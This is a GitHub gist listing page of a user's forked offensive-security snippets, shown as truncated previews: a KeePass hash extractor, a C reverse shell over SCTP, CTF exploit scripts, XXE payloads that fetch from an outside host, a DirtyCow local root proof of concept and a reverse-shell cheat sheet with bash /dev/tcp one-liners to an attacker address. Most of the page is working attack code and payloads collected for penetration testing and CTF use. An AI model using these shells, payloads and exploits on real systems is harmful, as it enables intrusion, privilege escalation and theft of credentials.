Skip to content

Instantly share code, notes, and snippets.

@waywardsun
waywardsun / keepass2john.py
Created Dec 21, 2017 — forked from HarmJ0y/keepass2john.py
Python port of John the Ripper's keepass2john - extracts a HashCat/john crackable hash from KeePass 1.x/2.X databases
View keepass2john.py
#!/usr/bin/python
# Python port of keepass2john from the John the Ripper suite (http://www.openwall.com/john/)
# ./keepass2john.c was written by Dhiru Kholia <dhiru.kholia at gmail.com> in March of 2012
# ./keepass2john.c was released under the GNU General Public License
# source keepass2john.c source code from: http://fossies.org/linux/john/src/keepass2john.c
#
# Python port by @harmj0y, GNU General Public License
#
@waywardsun
waywardsun / reverse_sctp_shell.c
Created Aug 11, 2017 — forked from 0xabe-io/reverse_sctp_shell.c
Simple C code to create a reverse shell over SCTP
View reverse_sctp_shell.c
// server: ncat -v --sctp -l PORT_NUM
#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netinet/sctp.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <string.h>
@waywardsun
waywardsun / pwn.py
Created Jun 19, 2017 — forked from saelo/pwn.py
Solution for "assignment" of GoogleCTF 2017
View pwn.py
#!/usr/bin/env python3
#
# Exploit for "assignment" of GoogleCTF 2017
#
# CTF-quality exploit...
#
# Slightly simplified and shortened explanation:
#
# The bug is a UAF of one or both values during add_assign() if a GC is
# triggered during allocate_value(). The exploit first abuses this two leak a
View XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@waywardsun
waywardsun / toilet-exploit.py
Created Jun 1, 2017 — forked from m1ghtym0/toilet-exploit.py
POC exploit for toilet service of FAUST-CTF-2017
View toilet-exploit.py
#!/usr/bin/env python2
from pwn import *
from re import findall
from random import choice, randint
from string import digits, ascii_uppercase
from hashlib import sha256
from sys import argv, exit
MAX_NAME_LEN = 64
@waywardsun
waywardsun / offsec.md
Created May 17, 2017 — forked from trietptm/offsec.md
Penetrating Testing/Assessment Workflow
View offsec.md

Penetrating Testing/Assessment Workflow & other fun infosec stuff

https://github.com/jivoi/pentest

My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tip and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*

View gist:84496cb1e4eeab23e421a6a0af60a3fa
my slides:
https://github.com/galvanic/talk-slides/blob/master/scapy.ipynb
official docs:
http://www.secdev.org/projects/scapy/demo.html
http://www.secdev.org/projects/scapy/doc/usage.html#sniffing
some tutorials from the internet:
https://theitgeekchronicles.files.wordpress.com/2012/05/scapyguide1.pdf
https://samsclass.info/124/proj11/proj17-scapy.html
@waywardsun
waywardsun / cowroot.c
Created Oct 21, 2016 — forked from rverton/cowroot.c
CVE-2016-5195 (DirtyCow) Local Root PoC
View cowroot.c
/*
* (un)comment correct payload first (x86 or x64)!
*
* $ gcc cowroot.c -o cowroot -pthread
* $ ./cowroot
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* Size of binary: 57048
* Racing, this may take a while..
* /usr/bin/passwd overwritten
View reverse_shells
#bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
#bash alt
exec /bin/bash 0&0 2>&0
#bash alt 2
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
#bash alt 3